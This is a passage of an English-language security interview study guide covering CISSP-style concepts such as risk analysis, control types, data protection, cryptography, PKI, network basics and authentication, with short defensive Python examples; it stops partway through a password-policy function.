This document summarizes, in English, the knowledge most likely to come up in security interviews. It is intended as a resource for security professionals preparing for interviews and for anyone who wants a deeper look at the field.
English for Security Interviews
Risk management
Risk management employs a vast terminology that must be clearly understood, especially for the CISSP exam.
Asset An asset is anything used in a business process or task.
Asset Valuation Asset valuation is the value assigned to an asset based on a number of factors, including importance to the organization, use in critical processes, actual cost, and nonmonetary expenses/costs (such as time, attention, productivity, and research and development). An asset-based or asset-initiated risk analysis starts with inventorying all organizational assets. Once that inventory is complete, a valuation needs to be assigned to each asset.
Threats Any potential occurrence that may cause an undesirable or unwanted outcome for an organization or for a specific asset is a threat. Threats are any action or inaction that could cause damage, destruction, alteration, loss, or disclosure of assets or that could block access to or prevent maintenance of assets. They can be intentional or accidental. They can originate from inside or outside. You can loosely think of a threat as a weapon that could cause harm to a target.
Threat Agents/Actors Threat agents or threat actors intentionally exploit vulnerabilities. Threat agents are usually people, but they could also be programs, hardware, or systems. Threat agents wield threats in order to cause harm to targets.
Threat Events Threat events are accidental occurrences and intentional exploitations of vulnerabilities. They can also be natural or person-made. Threat events include fire, earthquake, flood, system failure, human error (due to a lack of training or ignorance), and power outage.
Threat Vector A threat vector or attack vector is the path or means by which an attack or attacker can gain access to a target in order to cause harm. Threat vectors can include email, web surfing, external drives, Wi-Fi networks, physical access, mobile devices, cloud, social media, supply chain, removable media, and commercial software.
Vulnerability The weakness in an asset, or the absence or weakness of a safeguard or countermeasure, is a vulnerability. In other words, a vulnerability is a flaw, loophole, oversight, error, limitation, frailty, or susceptibility that enables a threat to cause harm.
Exposure Exposure is being susceptible to asset loss because of a threat; there is the possibility that a vulnerability can or will be exploited by a threat agent or event. Exposure doesn't mean that a realized threat (an event that results in loss) is actually occurring, just that there is the potential for harm to occur. The quantitative risk analysis value of exposure factor (EF) is derived from this concept.
Risk Risk is the possibility or likelihood that a threat will exploit a vulnerability to cause harm to an asset and the severity of damage that could result. The more likely it is that a threat event will occur, the greater the risk. The greater the amount of harm that could result if a threat is realized, the greater the risk. Every instance of exposure is a risk. When written as a conceptual formula, risk can be defined as follows: risk = threat * vulnerability, or risk = probability of harm * severity of harm. Thus, addressing either the threat or threat agent or the vulnerability directly results in a reduction in risk. This activity is known as risk reduction or risk mitigation, which is the overall goal of risk management. When a risk is realized, a threat agent, a threat actor, or a threat event has taken advantage of a vulnerability and caused harm to or disclosure of one or more assets.
The whole purpose of security is to prevent risks from becoming realized by removing vulnerabilities and blocking threat agents and threat events from jeopardizing assets.
Safeguards A safeguard, security control, protection mechanism, or countermeasure is anything that removes or reduces a vulnerability or protects against one or more specific threats. This concept is also known as a risk response. A safeguard is any action or product that reduces risk through the elimination or lessening of a threat or a vulnerability. Safeguards are the means by which risk is mitigated or resolved. It is important to remember that a safeguard need not involve the purchase of a new product; reconfiguring existing elements and even removing elements from the infrastructure are also valid safeguards or risk responses.
Attack An attack is the intentional attempted exploitation of a vulnerability by a threat agent to cause damage, loss, or disclosure of assets. An attack can also be viewed as any violation or failure to adhere to an organization's security policy. A malicious event does not need to succeed in violating security to be considered an attack.
Breach A breach, intrusion, or penetration is the occurrence of a security mechanism being bypassed or thwarted by a threat agent. A breach is a successful attack.
Risk management attempts to reduce or eliminate vulnerabilities or reduce the impact of potential threats by implementing controls or countermeasures.
Quantitative risk analysis
The major steps or phases in quantitative risk analysis are as follows:
1. Inventory assets, and assign a value (asset value [AV]).
2. Research each asset, and produce a list of all possible threats to each individual asset. This results in asset-threat pairings.
3. For each asset-threat pairing, calculate the exposure factor (EF).
4. Calculate the single loss expectancy (SLE) for each asset-threat pairing.
5. Perform a threat analysis to calculate the likelihood of each threat being realized within a single year, that is, the annualized rate of occurrence (ARO).
6. Derive the overall loss potential per threat by calculating the annualized loss expectancy (ALE).
7. Research countermeasures for each threat, and then calculate the changes to ARO, EF, and ALE based on an applied countermeasure.
8. Perform a cost/benefit analysis of each countermeasure for each threat for each asset. Select the most appropriate response to each threat.
Identifying risks
Evaluating the severity of and prioritizing those risks
Prescribing responses to reduce or eliminate the risks
Tracking the progress of risk mitigation
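To make the arithmetic concrete, the sketch below applies the standard formulas SLE = AV * EF and ALE = SLE * ARO, plus a simple cost/benefit check for a countermeasure. The asset value, percentages, and safeguard cost are illustrative assumptions, not figures from the source.

```python
# Minimal sketch of the quantitative risk formulas (illustrative numbers only).
def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = AV * EF (EF is the fraction of asset value lost in one incident)."""
    return asset_value * exposure_factor

def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE * ARO (ARO is the expected number of incidents per year)."""
    return sle * aro

# Example asset-threat pairing: a $200,000 database server threatened by ransomware.
av, ef, aro = 200_000, 0.6, 0.5
sle = single_loss_expectancy(av, ef)                  # 120,000
ale_before = annualized_loss_expectancy(sle, aro)     # 60,000

# After applying a countermeasure the EF and ARO drop; compare against its annual cost.
ale_after = annualized_loss_expectancy(single_loss_expectancy(av, 0.3), 0.1)  # 6,000
annual_cost_of_safeguard = 20_000
safeguard_value = ale_before - ale_after - annual_cost_of_safeguard  # 34,000 -> worth deploying
print(sle, ale_before, ale_after, safeguard_value)
```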
Risk Responses
Risk Mitigation Reducing risk, or risk mitigation, is the implementation of safeguards, security controls, and countermeasures to reduce and/or eliminate vulnerabilities or block threats. Deploying encryption and using firewalls are common examples of risk mitigation or reduction. Elimination of an individual risk can sometimes be achieved, but typically some risk remains even after mitigation or reduction efforts.
Risk Assignment Assigning risk or transferring risk is the placement of the responsibility of loss due to a risk onto another entity or organization. Purchasing cybersecurity or traditional insurance and outsourcing are common forms of assigning or transferring risk. Also known as assignment of risk and transference of risk.
Risk Deterrence Risk deterrence is the process of implementing deterrents to would-be violators of security and policy. The goal is to convince a threat agent not to attack. Some examples include implementing auditing, security cameras, and warning banners; using security guards; and making it known that the organization is willing to cooperate with authorities and prosecute those who participate in cybercrime.
Risk Avoidance Risk avoidance is the process of selecting alternate options or activities that have less associated risk than the default, common, expedient, or cheap option. For example, choosing to fly to a destination instead of driving to it is a form of risk avoidance. Another example is to locate a business in Arizona instead of Florida to avoid hurricanes. The risk is avoided by eliminating the risk cause. A business leader terminating a business endeavor because it does not align with organizational objectives and has a high risk versus reward ratio is also an example of risk avoidance.
Risk Acceptance Accepting risk, or acceptance of risk, is the result after a cost/benefit analysis shows countermeasure costs would outweigh the possible cost of loss due to a risk. It also means that management has agreed to accept the consequences and the loss if the risk is realized. In most cases, accepting risk requires a clearly written statement that indicates why a safeguard was not implemented, who is responsible for the decision, and who will be responsible for the loss if the risk is realized, usually in the form of a document signed by senior management.
Risk Rejection An unacceptable possible response to risk is to reject risk or ignore risk. Denying that a risk exists and hoping that it will never be realized are not valid or prudent due care/due diligence responses to risk. Rejecting or ignoring risk may be considered negligence in court.
Security Control Types
Preventive Examples of preventive controls include fences, locks, authentication, access control vestibules, alarm systems, separation of duties, job rotation, data loss prevention (DLP), penetration testing, access control methods, encryption, auditing, security policies, security-awareness training, antimalware software, firewalls, and intrusion prevention systems (IPSs).
Detective A detective control is deployed to discover or detect unwanted or unauthorized activity. Detective controls operate after the fact and can discover the activity only after it has occurred. Examples of detective controls include security guards, motion detectors, recording and reviewing of events captured by security cameras or CCTV, job rotation, mandatory vacations, audit trails, honeypots or honeynets, intrusion detection systems (IDSs), violation reports, supervision and review of users, and incident investigations.
Compensating Compensating controls can improve the effectiveness of a primary control or serve as the alternate or failover option in the event of a primary control failure. For example, if a preventive control fails to stop the deletion of a file, a backup can be a compensating control, allowing for restoration of that file. Here's another example: if a building's fire prevention and suppression systems fail and the building is damaged by fire so that it is not inhabitable, a compensating control would be having a disaster recovery plan (DRP) with an alternate processing site available to support work operations.
Corrective A corrective control modifies the environment to return systems to normal after an unwanted or unauthorized activity has occurred. Examples include installing a spring on a door so that it will close and relock, and using file integrity-checking tools, such as sigverif from Windows, which will replace corrupted boot files upon each boot event to protect the stability and security of the booted OS.
Recovery A recovery control attempts to repair or restore resources, functions, and capabilities after a security policy violation. Recovery controls typically address more significant damaging events compared to corrective controls, especially when security violations may have occurred. Examples of recovery controls include backups and restores, fault-tolerant drive systems, system imaging, server clustering, antimalware software, and database or virtual machine shadowing. In relation to business continuity and disaster recovery, recovery controls can include hot, warm, and cold sites; alternate processing facilities; service bureaus; reciprocal agreements; cloud providers; rolling mobile operating centers; and multisite solutions.
Directive A directive control is deployed to direct, confine, or control the actions of subjects to force or encourage compliance with security policies. Examples of directive controls include security policy requirements or criteria, posted notifications, guidance from a security guard, escape route exit signs, monitoring, supervision, and procedures.
Identifying and Classifying Information and Assets
Defining Sensitive Data Sensitive data is any information that isn't public or unclassified. It can include confidential, proprietary, protected, or any other type of data that an organization needs to protect due to its value to the organization, or to comply with existing laws and regulations.
Defining Data Classifications Organizations typically include data classifications in their security policy or a data policy. A data classification identifies the value of the data to the organization and is critical to protect data confidentiality and integrity.
Defining Asset Classifications Asset classifications should match the data classifications. In other words, if a computer is processing top secret data, the computer should also be classified as a top secret asset. Similarly, if media such as internal or external drives hold top secret data, the media should also be classified as top secret.
Determining Data Security Controls After defining data and asset classifications, you must define the security requirements and identify security controls to implement those requirements. When users know the value of the data, they are more likely to take appropriate steps to control and protect it based on the classification.
Understanding Data States
Data at Rest Data at rest (sometimes called data on storage) is any data stored on media such as system hard drives, solid-state drives (SSDs), external USB drives, storage area networks (SANs), and backup tapes. Strong symmetric encryption protects data at rest.
Data in Transit Data in transit (sometimes called data in motion or data being communicated) is any data transmitted over a network.
Data in Use Data in use (also known as data being processed) refers to data in memory or temporary storage buffers while an application is using it.
Data Loss Prevention
Data loss prevention (DLP) systems attempt to detect and block data exfiltration attempts. These systems have the capability of scanning unencrypted data looking for keywords and data patterns. There are two primary types of DLP systems:
Network-Based DLP A network-based DLP scans all outgoing data looking for specific data. Administrators place it on the edge of the network to scan all data leaving the organization. If a user sends out a file containing restricted data, the DLP system will detect it and prevent it from leaving the organization. The DLP system will send an alert, such as an email to an administrator. Cloud-based DLP is a subset of network-based DLP.
Endpoint-Based DLP An endpoint-based DLP can scan files stored on a system as well as files sent to external devices, such as printers. For example, an organization's endpoint-based DLP can prevent users from copying sensitive data to USB flash drives or sending sensitive data to a printer. Administrators configure the DLP to scan the files with the appropriate keywords, and if it detects files with these keywords, it will block the copy or print job. It's also possible to configure an endpoint-based DLP system to regularly scan files (such as on a file server) for files containing specific keywords or patterns, or even for unauthorized file types, such as MP3 files.
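As a rough illustration of the keyword-and-pattern scanning described above, here is a minimal sketch; the keyword list, the card-number regex, and the scan_outgoing() helper are assumptions for demonstration, not part of any real DLP product.

```python
# Minimal sketch of how a DLP engine might flag outgoing content by keyword and pattern.
import re

KEYWORDS = {"confidential", "proprietary", "top secret"}
# Very rough credit-card-like pattern (16 digits, optionally grouped) for illustration.
CARD_PATTERN = re.compile(r"\b(?:\d[ -]?){15}\d\b")

def scan_outgoing(text: str) -> list[str]:
    """Return the policy violations detected in an unencrypted outbound message."""
    hits = [f"keyword: {kw}" for kw in KEYWORDS if kw in text.lower()]
    if CARD_PATTERN.search(text):
        hits.append("pattern: possible payment card number")
    return hits

violations = scan_outgoing("Attached is the CONFIDENTIAL report, card 4111 1111 1111 1111")
if violations:
    print("Blocked and alert sent to administrator:", violations)
```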
Common Data Destruction Methods
Erasing Erasing media is simply performing a delete operation against a file, a selection of files, or the entire media.
Clearing Clearing, or overwriting, is a process of preparing media for reuse and ensuring that the cleared data cannot be recovered using traditional recovery tools.
Purging Purging is a more intense form of clearing that prepares media for reuse in less secure environments.
Degaussing A degausser creates a strong magnetic field that erases data on some media in a process called degaussing.
Destruction Destruction is the final stage in the lifecycle of media and is the most secure method of sanitizing media.
Ensuring Appropriate Data and Asset Retention
Record retention involves retaining and maintaining important information as long as it is needed and destroying it when it is no longer needed. An organization's security policy or data policy typically identifies retention time frames. Some laws and regulations dictate the length of time that an organization should retain data. Organizations have the responsibility of identifying laws and regulations that apply and complying with them.
Data Protection Methods
DLP
Encryption
CASB A cloud access security broker (CASB) monitors all activity and enforces administrator-defined security policies. A CASB would typically include authentication and authorization controls and ensure only authorized users can access the cloud resources. The CASB can also log all access, monitor activity, and send alerts on suspicious activity.
Pseudonymization Pseudonymization refers to the process of using pseudonyms ([ˈsuːdənɪm]) to represent other data.
Tokenization Tokenization is the use of a token to replace other data. It is often used with credit card transactions.
Anonymization Anonymization is the process of removing all relevant data so that it is theoretically impossible to identify the original subject or person.
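A minimal sketch of tokenization with a lookup table follows; the token format and the in-memory dictionary stand in for a real token vault and are purely illustrative assumptions.

```python
# Minimal sketch of tokenization: replace a sensitive value with a token and keep the
# token -> value mapping in a protected store that only the tokenization service can read.
import secrets

token_vault: dict[str, str] = {}   # stands in for a protected token vault

def tokenize(card_number: str) -> str:
    token = "tok_" + secrets.token_hex(8)
    token_vault[token] = card_number
    return token                     # safe to store/transmit in place of the card number

def detokenize(token: str) -> str:
    return token_vault[token]        # reversing the mapping requires access to the vault

t = tokenize("4111111111111111")
print(t, "->", detokenize(t))
```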
Understanding Data Roles
Common data roles include the data owner, asset owner, data custodian, data controller, data processor, data subject, and users/administrators, each with distinct responsibilities for protecting data.
Cryptography and Symmetric Key Algorithms (/krɪpˈtɑːɡrəfi/)
Confidentiality is perhaps the most widely cited goal of cryptosystems. Two main types of cryptosystems enforce confidentiality:
Symmetric (/sɪ'metrɪk/) cryptosystems use a shared secret key available to all users of the cryptosystem. Symmetric key cryptography has several weaknesses: key distribution is a major problem, because parties must have a secure method of exchanging the secret key before establishing communications; symmetric key cryptography does not implement nonrepudiation; keys must be regenerated often; and each time a participant leaves the group, all keys known by that participant must be discarded.
Asymmetric (/ˌeɪsɪˈmetrɪk/) cryptosystems use individual combinations of public and private keys for each user of the system. The major strengths of asymmetric key cryptography are: the addition of new users requires the generation of only one public-private key pair; users can be removed far more easily from asymmetric systems; key regeneration is required only when a user's private key is compromised; asymmetric key encryption can provide integrity, authentication, and nonrepudiation; and key distribution is a simple process. The major weakness of public key cryptography is its slow speed of operation.
Applications that require the secure transmission of large amounts of data use public key cryptography to establish a connection and then exchange a symmetric secret key. The remainder of the session then uses symmetric cryptography. This approach of combining symmetric and asymmetric cryptography is known as hybrid cryptography. Hybrid cryptography achieves the key distribution benefits of asymmetric cryptosystems with the speed of symmetric algorithms.
Message integrity is enforced through the use of encrypted message digests, known as digital signatures, created upon transmission of a message.
Authentication verifies the claimed identity of system users and is a major function of cryptosystems.
Nonrepudiation provides assurance to the recipient that the message was originated by the sender and not someone masquerading ([ˌmæskəˈreɪdɪŋ]) as the sender. It also prevents the sender from claiming that they never sent the message in the first place.
Zero-Knowledge Proof A zero-knowledge proof proves your knowledge of a fact to a third party without revealing the fact itself to that third party.
Split Knowledge When information is divided among multiple users, no single person has sufficient knowledge or privileges to compromise the security of the environment. This combination of separation of duties and two-person control in a single solution is called split knowledge.
Confusion and Diffusion Confusion occurs when the relationship between the plaintext and the key is so complicated that an attacker can't merely continue altering the plaintext and analyzing the resulting ciphertext to determine the key. Diffusion occurs when a change in the plaintext results in multiple changes spread throughout the ciphertext.
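To tie the hybrid-cryptography idea to something concrete, here is a minimal sketch using the third-party cryptography package (an assumption; the source names no library): a fast symmetric session key encrypts the bulk data, and the recipient's public key wraps that session key.

```python
# Minimal hybrid-cryptography sketch (pip install cryptography); the payload is illustrative.
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

# Recipient has an asymmetric key pair; only the public key is shared.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# Sender: bulk-encrypt the data with a symmetric key, then wrap that key asymmetrically.
session_key = Fernet.generate_key()
ciphertext = Fernet(session_key).encrypt(b"large confidential payload ...")
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(session_key, oaep)

# Recipient: unwrap the session key with the private key, then decrypt the bulk data.
recovered_key = private_key.decrypt(wrapped_key, oaep)
print(Fernet(recovered_key).decrypt(ciphertext))
```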
Hashing Algorithms
Message digests (also known as hash values or fingerprints) are summaries of a message's content produced by a hashing algorithm. It's very unlikely that two messages will produce the same hash value. Cases where a hash function produces the same value for two different messages are known as collisions.
The recipient can use the same hash function to recompute the message digest from the full message. They can then compare the computed message digest to the transmitted one to ensure that the message sent by the originator is the same one received by the recipient.
Requirements of a hash function:
The input can be of any length.
The output has a fixed length.
The hash function is relatively easy to compute for any input.
The hash function is one-way (cannot be reversed).
The hash function is collision resistant.
The hashed message authentication code (HMAC) algorithm implements a partial digital signature: it guarantees the integrity of a message during transmission, but it does not provide for nonrepudiation. HMAC can be combined with any standard message digest generation algorithm, such as MD5, SHA-2, or SHA-3, by using a shared secret key. Because HMAC relies on a shared secret key, it does not provide any nonrepudiation functionality.
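A minimal HMAC sketch using only the Python standard library follows; the shared key and message are illustrative, and the point is that integrity can be verified by anyone who holds the same key, which is also why HMAC cannot provide nonrepudiation.

```python
# Minimal sketch of HMAC with a shared secret key, standard library only.
import hmac, hashlib

shared_key = b"shared-secret-key"
message = b"transfer 100 to account 42"

tag = hmac.new(shared_key, message, hashlib.sha256).hexdigest()

# Receiver recomputes the HMAC and compares in constant time to verify integrity.
received_tag = tag
ok = hmac.compare_digest(received_tag, hmac.new(shared_key, message, hashlib.sha256).hexdigest())
print("message intact:", ok)   # integrity: yes; nonrepudiation: no, both sides know the key
```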
Digital Signatures Digital signatures use public key cryptography and hashing functions. Digital signature infrastructures have two distinct goals:
Digitally signed messages assure the recipient that the message truly came from the claimed sender; they enforce nonrepudiation.
Digitally signed messages assure the recipient that the message was not altered while in transit between the sender and recipient.
Common digital signature algorithms: DSA, RSA (Rivest–Shamir–Adleman), ECDSA (Elliptic Curve DSA).
If you want to encrypt a confidential message, use the recipient's public key. If you want to decrypt a confidential message sent to you, use your private key. If you want to digitally sign a message you are sending to someone else, use your private key. If you want to verify the signature on a message sent by someone else, use the sender's public key.
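The sketch below illustrates the sign-with-private-key / verify-with-public-key rule using RSA-PSS from the third-party cryptography package; the key pair and message are generated on the spot for demonstration rather than coming from a real PKI.

```python
# Minimal digital-signature sketch (RSA-PSS); message content is illustrative.
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.exceptions import InvalidSignature

sender_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
sender_public = sender_private.public_key()
message = b"I authorize this change request"

# Sign with the sender's PRIVATE key (hashing happens inside sign()).
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH)
signature = sender_private.sign(message, pss, hashes.SHA256())

# Anyone can verify with the sender's PUBLIC key; tampering raises InvalidSignature.
try:
    sender_public.verify(signature, message, pss, hashes.SHA256())
    print("signature valid: origin and integrity confirmed")
except InvalidSignature:
    print("signature check failed")
```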
Public Key Infrastructure
The composition of a digital certificate: the subject's identifying information and the subject's public key, signed by the certificate authority.
Certificate authority (CA) The CA ensures that the public key is legitimate.
Registration authorities (RAs) assist CAs with verifying users' identities prior to issuing digital certificates.
Public and private key pairs.
A certificate revocation ([ˌrevəˈkeɪʃn]) list (CRL) or the Online Certificate Status Protocol (OCSP) is used to check whether a certificate has been revoked.
Certificate Lifecycle
Enrollment When you want to obtain a digital certificate, you must first prove your identity to the CA in some manner; this process is called enrollment. The CA then issues a certificate containing your public key and signed by the CA.
Verification You verify the certificate by checking the CA's digital signature using the CA's public key.
Revocation A certificate authority revokes a certificate when it should no longer be trusted (for example, if the subject's private key is compromised).
Asymmetric Key Management
First, choose your encryption system wisely. You must also select your keys in an appropriate manner: use keys of sufficient length that are truly random, and keep your private key secret. Retire keys when they've served a useful life. Back up your keys!
Cryptographic Attacks
Analytic Attack Analytic attacks focus on the logic of the algorithm itself, seeking to find a weakness in the algorithm.
Implementation Attack This is a type of attack that exploits weaknesses in the implementation of a cryptography system. It focuses on exploiting the software code, not just errors and flaws but the methodology employed to program the encryption system.
Statistical Attack Statistical attacks attempt to find a vulnerability in the hardware or operating system hosting the cryptography application.
Brute-Force Attack Brute-force attacks are quite straightforward. Such an attack attempts every possible valid combination for a key or password.
Fault Injection Attack Attackers might use high-voltage electricity, high or low temperature, or other factors to cause a malfunction that undermines the security of the device.
Side-Channel Attack Side-channel attacks monitor externally observable characteristics of a system, such as power consumption, timing, or electromagnetic radiation, to retrieve information about data that is actively being encrypted or processed.
Timing Attack Timing attacks are an example of a side-channel attack where the attacker measures precisely how long cryptographic operations take to complete, gaining information about the cryptographic process that may be used to undermine its security.
There are two modifications that attackers can make to enhance the effectiveness of a brute-force attack:
Rainbow tables provide precomputed values for cryptographic hashes. These are commonly used for cracking passwords stored on a system in hashed form.
Specialized, scalable computing hardware designed specifically for the conduct of brute-force attacks may greatly increase the efficiency of this approach.
To help combat the use of brute-force attacks, including those aided by dictionaries and rainbow tables, cryptographers make use of a technology known as cryptographic salt.
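The sketch below shows salted, iterated password hashing with the standard library, which is the defense the salt paragraph describes; the iteration count and salt size are illustrative choices rather than values from the source.

```python
# Minimal sketch of salting and stretching a password so precomputed rainbow tables don't apply.
import hashlib, hmac, os

def hash_password(password: str, salt: bytes | None = None) -> tuple[bytes, bytes]:
    salt = salt or os.urandom(16)                       # unique random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    return hmac.compare_digest(hash_password(password, salt)[1], expected)

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("guess", salt, stored))                          # False
```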
Known Plaintext In the known plaintext attack, the attacker has a copy of the encrypted message along with the plaintext message used to generate the ciphertext (the copy).
Ciphertext-Only Attack In many cases, the only information you have at your disposal is the encrypted ciphertext message, a scenario known as the ciphertext-only attack.
Chosen Plaintext In this attack, the attacker obtains the ciphertexts corresponding to a set of plaintexts of their own choosing. This allows the attacker to attempt to derive the key used and thus decrypt other messages encrypted with that key.
Chosen Ciphertext In a chosen ciphertext attack, the attacker has the ability to decrypt chosen portions of the ciphertext message and use the decrypted portion of the message to discover the key.
Secure Design Principles
Security should be a consideration at every stage of a system’s development. Programmers, developers, engineers, and so on should build security into every application or system they develop, with greater levels of security provided to critical applications and systems that process sensitive information. Security is to be an element of design and architecture of a product starting at initiation and being maintained throughout the software development lifecycle (SDLC).
Secure Defaults
Never assume that the default settings of any product are secure. Many products ship with defaults that favor convenience over security (default passwords, open services, permissive permissions), so configurations should be reviewed and hardened before deployment.
Fail Securely
When a system experiences a failure, it should fail to a secure state (for example, denying access) rather than failing open.
Keep It Simple
In the realm of security, this concept is the encouragement to avoid overcomplicating the environment, organization, or product design. The more complex a system, the more difficult it is to secure.
Zero Trust
Zero trust is an approach to security where nothing is automatically trusted. Instead, each request for access is assumed to be from an unknown and untrusted location until verified. The goal is to have every access request be authenticated, authorized, and encrypted prior to the access being granted to a resource or asset. Zero trust is implemented using a wide range of security solutions, including internal segmentation firewalls (ISFWs), multifactor authentication (MFA), identity and access management (IAM), and next-generation endpoint security.
Privacy by Design
Privacy by Design (PbD) is a guideline to integrate privacy protections into products during the early design phase rather than attempting to tack them on at the end of development. Privacy is to be an element of design and architecture of a product starting at initiation and being maintained throughout the software development lifecycle (SDLC). Its principles are:
Proactive not reactive; preventive not remedial
Privacy as the default
Privacy embedded into design
Full functionality – positive-sum, not zero-sum
End-to-end security – full lifecycle protection
Visibility and transparency
Respect for user privacy
Techniques for Ensuring CIA
Confinement Process confinement allows a process to read from and write to only certain memory locations and resources. This is also known as sandboxing. It is the application of the principle of least privilege to processes. The goal of confinement is to prevent data leakage to unauthorized programs, users, or systems.
Bounds Each process that runs on a system is assigned an authority level. The authority level tells the operating system what the process can do. In simple systems, there may be only two authority levels: user and kernel. The authority level tells the operating system how to set the bounds for a process.
Isolation When a process is confined through enforcing access bounds, that process runs in isolation. Process isolation ensures that any behavior will affect only the memory and resources associated with the isolated process.
Access Controls To ensure the security of a system, you need to allow subjects to access only authorized objects. Access controls limit the access of a subject to an object.
Trust and Assurance A trusted system is one in which all protection mechanisms work together to process sensitive data for many types of users while maintaining a stable and secure computing environment.
Understand the Fundamental Concepts of Security Models
Trusted computing base
State machine model
Information flow model
Noninterference model
Take-grant model
Access control matrix
Bell–LaPadula model
Biba model
Clark–Wilson model
Brewer and Nash model
Goguen–Meseguer model
Sutherland model
Graham–Denning model
Harrison–Ruzzo–Ullman model
Physical Security Requirements
Secure Facility Plan A secure facility plan defines the security needs of your organization and emphasizes methods or mechanisms to employ to provide security. Such a plan is developed through risk assessment and critical path analysis. Critical path analysis is a systematic effort to identify relationships between mission-critical applications, processes, and operations and all the necessary supporting elements. A secure facility plan is based on a layered defense model. Only with overlapping layers of physical security can a reasonable defense be established against would-be intruders.
The top priority of security should always be the protection of the life and safety of personnel.
Intrusion Detection Systems: motion detectors, intrusion alarms, secondary verification mechanisms, CCTV
Fire Detection Systems
Water Suppression Systems
Perimeter Security Controls: mantraps (access control vestibules), security guards
Secure Network Architecture and Components
OSI Functionality The OSI model divides networking tasks into seven layers. Each layer is responsible for performing specific tasks or operations with supporting data exchange between two computers. Communication between protocol layers occurs through encapsulation and deencapsulation. Encapsulation is the addition of a header, and possibly a footer, to the data received by each layer from the layer above before it's handed off to the layer below. The inverse action is deencapsulation.
Application Layer The Application layer (layer 7) is responsible for interfacing with user applications.
Presentation Layer The Presentation layer (layer 6) is responsible for transforming data into a format that any system following the OSI model can understand.
Session Layer The Session layer (layer 5) is responsible for establishing, maintaining, and terminating communication sessions between two computers.
Transport Layer The Transport layer (layer 4) is responsible for managing the integrity of a connection and controlling the session.
Network Layer The Network layer (layer 3) is responsible for logical addressing and performing routing.
Data Link Layer The Data Link layer (layer 2) is responsible for formatting the packet for transmission.
Physical Layer The Physical layer (layer 1) converts a frame into bits for transmission over the physical connection medium.
Domain Name System The Domain Name System (DNS) resolves a human-friendly domain name into its IP address equivalent.
Rogue DNS Server A rogue DNS server can listen in on network traffic for any DNS query or specific DNS queries related to a target site. Then the rogue DNS server sends a DNS response to the client with false IP information.
Performing DNS Cache Poisoning DNS poisoning involves attacking DNS servers and placing incorrect information into their zone files or caches.
DNS Pharming Another attack closely related to DNS poisoning and/or DNS spoofing is DNS pharming. Pharming is the malicious redirection of a valid website's URL or IP address to a fake website. Pharming typically occurs either by modifying the local hosts file on a system or by poisoning or spoofing DNS resolution.
IPv4 vs. IPv6 IPv4 is the version of Internet Protocol that is most widely used around the world. However, IPv6 is being rapidly adopted for both private and public network use. IPv4 uses a 32-bit addressing scheme, whereas IPv6 uses 128 bits for addressing.
ARP Concerns Address Resolution Protocol (ARP) is used to resolve IP addresses (32-bit binary numbers for logical addressing) into MAC addresses (48-bit binary numbers for physical addressing).
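Because DNS resolution comes up constantly in interviews, here is a minimal standard-library sketch of a forward lookup; example.com is just an example host, and the answers depend on whichever resolver the system is configured to use.

```python
# Minimal sketch of forward DNS resolution from Python's standard library.
import socket

hostname = "example.com"
ip_address = socket.gethostbyname(hostname)   # name -> IPv4 address (an "A" record lookup)
print(hostname, "resolves to", ip_address)

# getaddrinfo also surfaces IPv6 (AAAA) answers where available.
for family, _, _, _, sockaddr in socket.getaddrinfo(hostname, 443, proto=socket.IPPROTO_TCP):
    print(family.name, sockaddr[0])
```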
Managing Identity and Authentication
Controlling Access to Assets
Information An organization's information includes all of its data.
Systems An organization's systems include any IT systems that provide one or more services.
Devices Devices refer to any computing system, including routers, switches, servers, desktop computers, portable laptop computers, tablets, smartphones, and external devices such as printers.
Facilities An organization's facilities include any physical location that it owns or rents. This could be individual rooms, entire buildings, or whole complexes of several buildings. Physical security controls help protect facilities.
Applications Applications frequently provide access to an organization's data.
Physical security controls protect systems, devices, and facilities by controlling access and controlling the environment. As an example, organizations often have a server room where servers, routers, and switches are running; using cipher locks to control entry into the server room is an appropriate physical control.
Logical access controls are the technical controls used to protect access to information, systems, devices, and applications. They include authentication, authorization, and permissions. They help prevent unauthorized access to data and configuration settings on systems and other devices.
Managing Identification and Authentication Identification is the process of a subject claiming an identity. Authentication verifies the subject's identity by comparing one or more factors against a database of valid identities, such as user accounts. Identification and authentication occur together as a single two-step process. Providing an identity is the first step, and providing the authentication information is the second step. Without both, a subject cannot gain access to a system.
Authorization and Accountability
Authorization Subjects are granted access to objects based on proven identities. Authorization indicates who is trusted to perform specific operations.
Accountability Auditing tracks subjects and records when they access objects, creating an audit trail in one or more audit logs. For example, auditing can record when a user reads, modifies, or deletes a file. Auditing provides accountability.
Password Policy Components: maximum age, password complexity, password length, password history
Multifactor Authentication (MFA) Multifactor authentication (MFA) is any authentication using two or more factors. As an example, smartcards require users to insert their card into a reader and enter a PIN.
Mutual Authentication When a client accesses a server, both the client and the server provide authentication. This prevents a client from revealing information to a rogue server. Mutual authentication methods commonly use digital certificates.
Single Sign-On Single sign-on (SSO) is a centralized access control technique that allows a subject to be authenticated once on a system and access multiple resources without authenticating again. Many cloud-based applications use SSO solutions, making it easier for users to access resources over the internet. Cloud-based applications use federated identity management (FIM) systems, which are a form of SSO.
Just-in-Time Some federated identity solutions support just-in-time (JIT) provisioning. These solutions automatically create the relationship between two entities so that new users can access resources.
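A minimal sketch of checking the password length and complexity policy components mentioned above follows; the specific thresholds (12 characters, four character classes) are illustrative assumptions rather than values from the source.

```python
# Minimal sketch of enforcing password-length and password-complexity policy components.
import string

def check_password_policy(password: str, min_length: int = 12) -> list[str]:
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.isdigit() for c in password):
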